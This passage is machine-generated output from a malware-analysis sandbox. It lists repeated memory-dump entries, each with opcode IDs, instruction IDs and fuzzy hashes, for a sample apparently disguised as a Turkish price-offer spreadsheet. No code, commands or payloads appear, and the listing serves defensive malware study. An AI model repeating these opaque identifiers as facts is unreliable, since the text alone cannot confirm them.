                                                                        • Instruction Fuzzy Hash: 3102B031600209CFDB15CFA8C684AAEBBF6BFC8309F158555E485DB2A5D730ED82CB59
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'q
                                                                        • API String ID: 0-1807707664
                                                                        • Opcode ID: c3203480d416f137ed96ca43628f001c9cca4c397bfec754509087542e2fffb4
                                                                        • Instruction ID: ff2e1452a2251ca40c17ed1901e18f99c35e54808f57737ee073fba6845ee027
                                                                        • Opcode Fuzzy Hash: c3203480d416f137ed96ca43628f001c9cca4c397bfec754509087542e2fffb4
                                                                        • Instruction Fuzzy Hash: B34158716002198FDB19DF68D988AAA7BBAFF88715F100469F956CB3B1CB30DC50CB95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (oq
                                                                        • API String ID: 0-1999159160
                                                                        • Opcode ID: dc4d963cdd2c3ff5a8228a4f3729ea21814496b190c1cea8746b2ca65dbc5485
                                                                        • Instruction ID: 7408416a465666d9112d91792bf7a86aa59ae5cb4568ba0eebea19a4872c8c49
                                                                        • Opcode Fuzzy Hash: dc4d963cdd2c3ff5a8228a4f3729ea21814496b190c1cea8746b2ca65dbc5485
                                                                        • Instruction Fuzzy Hash: 6631D272B042048FCB16AB78E8147AEBBF7AFC9714F18446AE516DB295CF318C05CB94
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 20fb42b6f2dc315e78f5012fc93fb398f70636c5a2bf4ea7e4ad3d4dac6f3d2c
                                                                        • Instruction ID: 15a9c9135f42c6cd9927ad5505cc46838bb31a35337bc6be1a1c12f79c6cf7c1
                                                                        • Opcode Fuzzy Hash: 20fb42b6f2dc315e78f5012fc93fb398f70636c5a2bf4ea7e4ad3d4dac6f3d2c
                                                                        • Instruction Fuzzy Hash: 5B1297750253428FE7602F30E6AC12ABF7CFB0FB67B056C61E41FD1059AB3156899B62
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cd93282ea4142644a59c43d6305912091cd56822c0a65ae79f1e6bbca3df2e52
                                                                        • Instruction ID: d9594af25629e4712eda4b4c9ca205429ef9fbe889538742739054bc5f2ffd29
                                                                        • Opcode Fuzzy Hash: cd93282ea4142644a59c43d6305912091cd56822c0a65ae79f1e6bbca3df2e52
                                                                        • Instruction Fuzzy Hash: D3B1CEB07042149FEB259F38D855B6E7BF6AFC9308F14452AE446CB3A6CB34C942C795
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 486e6671988bd79d9331a82b2c3fc6ad73c26c2eabc7ec67aeeeb053cde7eabb
                                                                        • Instruction ID: c1879a6dd1bbda19adc1e1830efde7381a9a3f3098556f9db9d8bad6cb6157f7
                                                                        • Opcode Fuzzy Hash: 486e6671988bd79d9331a82b2c3fc6ad73c26c2eabc7ec67aeeeb053cde7eabb
                                                                        • Instruction Fuzzy Hash: 1791CB74A00209CFCB16CF98C4849DDBBF6FF88314F10856AE896EB225D735A955CB94
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8d9c565e17ad234748abb284055a462648e4c751df3fadd6b563c34df01d22a
                                                                        • Instruction ID: e3095f711a5e6f3eacc84f68497a496fa56ebe261a1049764263f91de07b6d05
                                                                        • Opcode Fuzzy Hash: e8d9c565e17ad234748abb284055a462648e4c751df3fadd6b563c34df01d22a
                                                                        • Instruction Fuzzy Hash: 7B7139347006098FDB25DF6CC894AAA7BEAAF89708F1501A9F916DB371DB70DC41CB54
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a70602a4f76f2bc17ebb4a3432fee6525cc88c6dc0569367a94ed95e0d78cf4
                                                                        • Instruction ID: e9b3928e71c7cf7eb54f8d72ed18b8e9ee02d61696f131dc242a3930a1b48497
                                                                        • Opcode Fuzzy Hash: 1a70602a4f76f2bc17ebb4a3432fee6525cc88c6dc0569367a94ed95e0d78cf4
                                                                        • Instruction Fuzzy Hash: FB71D2B0A00509EFDB14CF6DC48596DBBF6BFC9268B148169D502E7365D731E940CF64
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ee852780c52f857b3e88372bc8f1b94837202314ae626bfbad9956cf3529116
                                                                        • Instruction ID: dce3dee3320fcfac825f3d3d397a18d72c2f77c541a7ddf23f354213db8c4af3
                                                                        • Opcode Fuzzy Hash: 4ee852780c52f857b3e88372bc8f1b94837202314ae626bfbad9956cf3529116
                                                                        • Instruction Fuzzy Hash: 5751B375E01218CFCB08DFAAD49499DBBF6FF89314B209569E805AB364DB35A842CF10
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d30d839c3907138a455bb7ecbaa9a0d6cb4492779fa02821eb7bacde090d0d15
                                                                        • Instruction ID: fc660fa299153b339817cd4cd3fec16ab5942bced60917ac3452147d4b4f0a7a
                                                                        • Opcode Fuzzy Hash: d30d839c3907138a455bb7ecbaa9a0d6cb4492779fa02821eb7bacde090d0d15
                                                                        • Instruction Fuzzy Hash: ED51A474E01218DFDB54DFA9D9949DDBBF2BF89310F248169E809AB365DB31A901CF10
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eb72365a9e96c4c929a6b761e9ffe4ebfa658a28c6ae3ee388bf8f3092ddbca7
                                                                        • Instruction ID: b2cd8ef3f1e675b101b3c0ba479fed57d2060b007bc2bcf872f2550cd609bc66
                                                                        • Opcode Fuzzy Hash: eb72365a9e96c4c929a6b761e9ffe4ebfa658a28c6ae3ee388bf8f3092ddbca7
                                                                        • Instruction Fuzzy Hash: 2051A575E01318CFCB08DFAAD58499DBBF6FF89314B209569E805AB324DB31A842CF54
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a180de14bf06164c2d99b0c39a40c44092d37b718596ac0155b45a13ab302f30
                                                                        • Instruction ID: b293d1d39a77d97eb2903c450ff78eae2b529a66e140eca87a2016207d49950a
                                                                        • Opcode Fuzzy Hash: a180de14bf06164c2d99b0c39a40c44092d37b718596ac0155b45a13ab302f30
                                                                        • Instruction Fuzzy Hash: 0851E034D01318CFDB25DFA4D894AADBBB6FF89304F604169E806AB399DB355986CF40
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 56016de14e887f93af5a7d6121998e3a2df8ee719ccdaff2d08b30f552cfd672
                                                                        • Instruction ID: 0ebd49d29b95bac9a1639d44a573ab8b246a53dfef27f66466af3fec5bc9826f
                                                                        • Opcode Fuzzy Hash: 56016de14e887f93af5a7d6121998e3a2df8ee719ccdaff2d08b30f552cfd672
                                                                        • Instruction Fuzzy Hash: B031AE31300209EFCF02AFA9D845AAF7BB6FB88715F104464F9159B249CB35C925DBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8f91bacb4fff605b89b2fe2cc8c3e4eb76c8cd282eef105dbb329f5257cc35be
                                                                        • Instruction ID: c29767020f29cbfad133c41c651b55427edb35622c6c67ae0746ce55fdfbbf6a
                                                                        • Opcode Fuzzy Hash: 8f91bacb4fff605b89b2fe2cc8c3e4eb76c8cd282eef105dbb329f5257cc35be
                                                                        • Instruction Fuzzy Hash: 0B313A30600349CFEB11CB68C888B6A7BEAEB8831DF548466E918CB256D7B1DC41CB95
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d93ced9af91bcd393ee1a1a98dd73670e2430c953fde87f8d3621c6835b8b750
                                                                        • Instruction ID: 6bf2a9112c6affa92ded7375c685be8baa295ae871fe91efa63751d277c2dc5a
                                                                        • Opcode Fuzzy Hash: d93ced9af91bcd393ee1a1a98dd73670e2430c953fde87f8d3621c6835b8b750
                                                                        • Instruction Fuzzy Hash: FE21D3303042004BEB25566D845473E769BAFC470CF1481BDF506DBF9AEE35CC429389
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d382a06e5a63fd25537e0e21c7db81ab4654315ec295613f255cc803df42209b
                                                                        • Instruction ID: fd1de0cae495836e367182d6b407cf7d8b6753c804a56daca518cfba8c2ff8b4
                                                                        • Opcode Fuzzy Hash: d382a06e5a63fd25537e0e21c7db81ab4654315ec295613f255cc803df42209b
                                                                        • Instruction Fuzzy Hash: F331D1316002858FDB11CF28C888B5ABFF2AFC5314F048599E599EF3A2D334E800CB65
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7ba42e04cb954dbfc1a7737622e74a23bfb08558b3cb1ab49e79772d491cdd1e
                                                                        • Instruction ID: d0f2c6ff197a68acb5f524211b9547153e8a14d0cc33919adc8fa2b43f169f22
                                                                        • Opcode Fuzzy Hash: 7ba42e04cb954dbfc1a7737622e74a23bfb08558b3cb1ab49e79772d491cdd1e
                                                                        • Instruction Fuzzy Hash: 1021D7303043104BDB26177D8954A3E7A9BAFC474CB1841BDF546EBB5AEE35C842D345
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c47ebfc7c2c3dfe1b83ba1b53c1391e12639eab0ddf5957268bd8ed44a9f0f1
                                                                        • Instruction ID: d80b0826575dfcf2e06750cfb96adaaa67e9e7332ff8a729dcfd9b97acfced80
                                                                        • Opcode Fuzzy Hash: 1c47ebfc7c2c3dfe1b83ba1b53c1391e12639eab0ddf5957268bd8ed44a9f0f1
                                                                        • Instruction Fuzzy Hash: 1521A331A002149FCF15DF2CC450AAF7BB9EBD9364B608519E8499B258DB31EE42CBD5
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3798335658.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_ebd000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5751c6c4c9c63d5c15e747bbcbfe2ae3660ca64eff186a8a87d6195754da43eb
                                                                        • Instruction ID: 1137e2cb4431405745ae0231df18687367780839aee8dd97542e9c9bb59afcb7
                                                                        • Opcode Fuzzy Hash: 5751c6c4c9c63d5c15e747bbcbfe2ae3660ca64eff186a8a87d6195754da43eb
                                                                        • Instruction Fuzzy Hash: 50210672508200EFDB15DF10D9C0B97BB65FB98318F248569E80A1B256D336D856CAA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 10a153530473925471ad2b714850af7a8b8a3604c26b5f2817d874e3675b8b78
                                                                        • Instruction ID: 4e0e7bef034c776fd0ba8e802de5754ee5822b36aceefbb44ef9ef260c25eac8
                                                                        • Opcode Fuzzy Hash: 10a153530473925471ad2b714850af7a8b8a3604c26b5f2817d874e3675b8b78
                                                                        • Instruction Fuzzy Hash: 992105353006109FD7259B29C455A2FB7A6FFC9B697144168E916DB7A8CF30DC028B84
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 691a8e751c64fe823877d63e240dce05e2586e36aa9b5e144ea2826ad1bcb447
                                                                        • Instruction ID: 8083f08debfc83aae1e0649d39945654a5890eb479addf16c8fa9a5ea80a0800
                                                                        • Opcode Fuzzy Hash: 691a8e751c64fe823877d63e240dce05e2586e36aa9b5e144ea2826ad1bcb447
                                                                        • Instruction Fuzzy Hash: C3311270C01318DFEB14DFA9D444BEEBBB6AF89304F508429D815BB294DB785A4ACF51
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3798569775.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_ecd000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d4b1789dfeb5547b31a87a255bc74999ec8faeb9fd595a8c6b119372869c6cb
                                                                        • Instruction ID: e6a608255674302c73681fa962a361cc3d59e8a940aa8203451e382d1d7c5bc1
                                                                        • Opcode Fuzzy Hash: 0d4b1789dfeb5547b31a87a255bc74999ec8faeb9fd595a8c6b119372869c6cb
                                                                        • Instruction Fuzzy Hash: 2E21CF71508204EFDB14DF28DA85F26BB66EB84318F24C56DE8495B292C737D847CA62
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c722c46cd5eba8834a1f54f2d27df72c0716a731f168789958a7c5ab316ed4f4
                                                                        • Instruction ID: a57c08244b75c53fdf65bc8b98df4bcea47511cafa6cae695e769365513be112
                                                                        • Opcode Fuzzy Hash: c722c46cd5eba8834a1f54f2d27df72c0716a731f168789958a7c5ab316ed4f4
                                                                        • Instruction Fuzzy Hash: FD2138317052488FCF02AF68E445AAF7BB6EF84724F1040A9F8158B359C734CD15CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d15bed6ab3b7ef6f87cc23e23c3041b431a7deeedf8f8a13b93263dff3d16002
                                                                        • Instruction ID: d6b0bd4a9a99ba604269cf7b0a4f5d954a91004b1eb41b8bb5da70ce72f726aa
                                                                        • Opcode Fuzzy Hash: d15bed6ab3b7ef6f87cc23e23c3041b431a7deeedf8f8a13b93263dff3d16002
                                                                        • Instruction Fuzzy Hash: 5F31C478E01318CFCB44EFA9E58499DBBB6FF49314B209569E809AB324DB31AC41CF40
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ac8f7fd436496c05be113a8da39a656d4145cdb2dbcb9abf3d9e5e66d84ac85
                                                                        • Instruction ID: 94b32e5d5e14984c4451bc93e338e2ac454fbb1f496f2ac68024ea00361ac706
                                                                        • Opcode Fuzzy Hash: 4ac8f7fd436496c05be113a8da39a656d4145cdb2dbcb9abf3d9e5e66d84ac85
                                                                        • Instruction Fuzzy Hash: B6216D30E01248DFEB15CFA6D550AEEBFB6AF88309F148059E415AA394DB30D941CF20
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b282dc9f925a93369d2f153bc8acef20f334cb15e663b9ba847a3038fdd350b9
                                                                        • Instruction ID: 38ee8f23aa72a4e905a195af8e2f3c8887a8899aea6951dcd93213c61ed022a8
                                                                        • Opcode Fuzzy Hash: b282dc9f925a93369d2f153bc8acef20f334cb15e663b9ba847a3038fdd350b9
                                                                        • Instruction Fuzzy Hash: 521106357056119FD7168B2DD85993EBBA6BFC576671840B9E906CB368CF30CC02CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cf2db6dd695c6a5ff7f42f94e2e8f1cea1c193b0cec619d1622f6ca9ca00654b
                                                                        • Instruction ID: b1fdb8a96103a88d40654d410b2489c17aac464dc57971bab002bac5a214c84f
                                                                        • Opcode Fuzzy Hash: cf2db6dd695c6a5ff7f42f94e2e8f1cea1c193b0cec619d1622f6ca9ca00654b
                                                                        • Instruction Fuzzy Hash: 5321D074C0520A8FCB10EFA9D8456EEBFF4EF4A314F10426AD805B2214E7355A85CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: df5783b8c1a47cb615862c7222aa5693362a057fefb17277a2a39659efd5ec8d
                                                                        • Instruction ID: 2cb1f24270d19a5b334e7ad0e7960e6ecbf423b56fa507db7b236906d0168be9
                                                                        • Opcode Fuzzy Hash: df5783b8c1a47cb615862c7222aa5693362a057fefb17277a2a39659efd5ec8d
                                                                        • Instruction Fuzzy Hash: AC115E35B002089FCB149F68D954B9EFBBABF8C711F144069E915E7294DA719C14CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 361f591489836d1447d9a57f2977ec71013bb3fc18dce00b670ec41dfd97c2a3
                                                                        • Instruction ID: 611d640ea1e5a9ef3abe0e7e609c8dcaa8ce5a468da18d8d841d7e84b21bf57c
                                                                        • Opcode Fuzzy Hash: 361f591489836d1447d9a57f2977ec71013bb3fc18dce00b670ec41dfd97c2a3
                                                                        • Instruction Fuzzy Hash: 681179B5900208DFCB20CF58C948BABFBF6EF88318F44856AE5599B621D375D948CF54
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3798335658.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_ebd000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                        • Instruction ID: ff245c457751fd3f92f8152658e385df26306495cba946f1ee41a6a5d8f75e75
                                                                        • Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                        • Instruction Fuzzy Hash: 4611D376504240DFCB16CF10D9C4B56BF72FB94328F24C5A9D8490B656C336D85ACBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cb7689c2e837ea30e52efb3e027bc39fa4a76df81186e1789c887aa291d745a7
                                                                        • Instruction ID: 49f278695c198de47ddfbbd4f86727e92289da4ea24af02fa93e8202321c6733
                                                                        • Opcode Fuzzy Hash: cb7689c2e837ea30e52efb3e027bc39fa4a76df81186e1789c887aa291d745a7
                                                                        • Instruction Fuzzy Hash: CF215E74D0024ACFEB54EFB9D951B9EBFF2FF45300F1486AAD054AB265E7305A068B81
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 914efa41e95c69df8ad79628e08ccf6465fc615797e48eb7819a525073599751
                                                                        • Instruction ID: 2cca985559a5cde0953332ade20ca3fe474cbe51b8797ce893bb760321294752
                                                                        • Opcode Fuzzy Hash: 914efa41e95c69df8ad79628e08ccf6465fc615797e48eb7819a525073599751
                                                                        • Instruction Fuzzy Hash: E6114F74D00209DFEB44EFB9D551B9EBFF6FB44304F1086A9D014AB265EB705A458F81
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3798569775.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_ecd000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                        • Instruction ID: 51e6347782a816e2e5a85abede4f9ead69c23460b7b04c96a2fcd416e1335c70
                                                                        • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
